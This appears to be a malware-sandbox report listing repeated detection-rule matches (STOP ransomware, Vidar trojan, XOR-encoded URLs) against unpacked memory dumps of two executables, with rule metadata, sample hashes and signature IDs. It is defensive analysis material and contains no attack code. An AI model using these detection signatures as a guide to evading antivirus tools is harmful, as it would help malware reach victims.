Source: 15.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 9.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.2OmglUwx83.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.2OmglUwx83.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.2OmglUwx83.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.0.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 8.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 9.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 15.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.0.build2.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 11.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.0.build2.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 11.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 9.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.0.build2.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 15.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 15.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 8.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 8.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.2OmglUwx83.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 9.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 14.2.2OmglUwx83.exe.22115a0.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 14.2.2OmglUwx83.exe.22115a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 14.2.2OmglUwx83.exe.22115a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 9.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 8.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
